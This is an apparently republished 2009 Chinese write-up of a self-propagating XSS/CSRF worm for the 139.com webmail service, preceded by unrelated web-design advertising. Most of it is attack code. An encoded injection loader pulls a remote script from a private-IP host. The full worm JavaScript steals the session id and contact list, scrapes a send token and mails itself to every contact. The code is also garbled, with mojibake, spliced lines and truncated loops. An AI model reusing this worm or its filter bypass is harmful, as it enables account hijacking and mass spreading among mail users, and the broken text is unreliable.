139郵箱蠕蟲編寫實(shí)例
站在用戶的角度思考問題�,與客戶深入溝通,找到魯山網(wǎng)站設(shè)計(jì)與魯山網(wǎng)站推廣的解決方案����,憑借多年的經(jīng)驗(yàn)��,讓設(shè)計(jì)與互聯(lián)網(wǎng)技術(shù)結(jié)合��,創(chuàng)造個(gè)性化��、用戶體驗(yàn)好的作品�,建站類型包括:成都網(wǎng)站設(shè)計(jì)、成都網(wǎng)站制作����、企業(yè)官網(wǎng)、英文網(wǎng)站����、手機(jī)端網(wǎng)站、網(wǎng)站推廣�����、域名注冊�����、網(wǎng)絡(luò)空間�、企業(yè)郵箱。業(yè)務(wù)覆蓋魯山地區(qū)�。
Author:[sh0wrun],[woyigui]
Date:2009-09-09
聲明:該漏洞已報(bào)告并已修復(fù),切勿用于非法目的。
原理分析:
我們經(jīng)常會(huì)用到的mail.139.com�,由于對郵件正文過濾不嚴(yán),導(dǎo)致存在xss漏洞�。他們盡管實(shí)現(xiàn)了對style="xss:expression"進(jìn)行過濾,但是可以通過添加/* */繞過,如:。在添加/* */后���,該腳本能夠在IE瀏覽器執(zhí)行����。
同時(shí),經(jīng)過分析發(fā)現(xiàn),mail.139.com中發(fā)送郵件的功能存在CSRF弱點(diǎn);可以通過Ajax技術(shù)獲取發(fā)送郵件所需要的mid值���。另外郵箱的“通信錄“中的聯(lián)系人郵件可以直接通過javascript取出����。
滿足了編寫csrf worm的3個(gè)條件,接下來的工作,就是通過編寫javascript代碼來實(shí)現(xiàn)了���。
跨站代碼:
該部分要實(shí)現(xiàn)的功能就是,觸發(fā)瀏覽器去讀取遠(yuǎn)端的js腳本,并且執(zhí)行該腳本:
Original:
var ig =document.createElement("script");ig.src="http://192.168.9.104/woyigui/139.js";try {document.getElementsByTagName("body")[0].appendChild(ig);} catch (e) {document.documentElement.appendChild(document.createElement("body"));document.getElementsByTagName("body")[0].appendChild(ig);}
對該部分編碼按照10進(jìn)制進(jìn)行編碼,以避免關(guān)鍵字被替換,并調(diào)用:
該部分代碼,需放置在郵件正文中傳送��。
腳本功能的實(shí)現(xiàn):
主要實(shí)現(xiàn)了如下功能:
1.通過腳本,讀取聯(lián)系人的郵箱地址�。
該部分信息,可以通過top.LinkManList.concat()獲取�����。
2.通過腳本�,獲取sid值
該部分信息,可以通過window.top.location.href,配合正則表達(dá)式獲取到。
3.獲取發(fā)送郵件所需要的mid值
在獲取到sid值后,通過script打開"寫郵件"頁面,讀取mid值��。
4.發(fā)送郵件
發(fā)送郵件功能只驗(yàn)證mid值,因此在獲取到正確的mid值后,連同獲取到的聯(lián)系人一起,構(gòu)造post數(shù)據(jù),發(fā)送郵件�����。
5.改寫郵件轉(zhuǎn)發(fā)規(guī)則和自動(dòng)回復(fù)規(guī)則
在有正確的sid后,構(gòu)造post���。
完整代碼:
var xssed = false;
if (typeof XSSflag != "undefined"){
xssed = true;
}
var XSSflag = [
{name: "version", url: "1.0"},
];
if ( xssed != true ) {
var xmlhttp;
//create XHR
function createXMLHttp(){
try {
xmlhttp = new XMLHttpRequest();
} catch (e) {
var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0',
'MSXML2.XMLHTTP.4.0',
'MSXML2.XMLHTTP.3.0',
'MSXML2.XMLHTTP',
'Microsoft.XMLHTTP' );
var success = false;
for (var i=0;i < XMLHTTP_IDS.length && !success; i++) {
try {
xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
success = true;
} catch (e) {}
}
if (!success) {
throw new Error('Unable to create XMLHttpRequest.');
}
}
}
function domid (dourl) {
createXMLHttp();
var tmp = "";
xmlhttp.open("GET", dourl, false);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");
xmlhttp.setRequestHeader("Connection", "close");
xmlhttp.send(null);
setTimeout( tmp = xmlhttp.responseText,500);
return tmp;
}
function startRequest(doUrl, tomail, subject, Content, account, mid, sid ){
createXMLHttp();
var params = "funcid=compose&sid="+ sid +"&mid="+ mid +"&hidRemoteIp=&ishtml=y&optype=send.x&idOpType=&text="+ Content +"&destcgi= &funcid=compose&netfdrhost=&to="+ tomail +"&cc=&bcc=&subject="+ subject +"&year= &month=&day=&hour=undefined&compinfo_minute=&chkHtmlMessage_text=y&chkHtmlMessage=y&ifsavetosent= xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded;");
y&account="+ account +"&destcgi=&netfdrhost=&split_rcpt=n&return_receipt=0&priority=0";
xmlhttp.open("POST", doUrl, false);
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "close");
xmlhttp.send(params);
}
function doMyAjax()
{
var strPer = '/coremail/cgi/attachfapps';
var tomail = '
;';
var subject = "test20";
var Content = "";
var account = "";
var sid = window.top.location.href.replace(/.*&sid=(.*)/,"$1");
var tmpmid = domid("/coremail/fcg/ldmmapp?funcid=compose&sid=" + sid );
var mid="",text="";
text=tmpmid.split("\n");
for (var i=0;i < text.length; i++)
{
var patt=/name=\"mid\" value=\"/;
if ( patt.test(text[i]))
{
mid=text[i].replace(/.*name=\"mid\" value=\"(.*)\".*/, "$1");
break;
}
}
var mail_address=top.LinkManList.concat();
for (var i=0,len=mail_address.length;i
;"; } } try { startRequest(strPer, encodeURIComponent(tomail), encodeURIComponent(subject),
encodeURIComponent(Content), encodeURIComponent(account), mid, sid );
} catch (e) {
alert("send data error!");
}
}
doMyAjax();
}
|
新聞標(biāo)題:139郵箱蠕蟲編寫實(shí)例
文章位置:
http://uogjgqi.cn/article/cdpsdhi.html
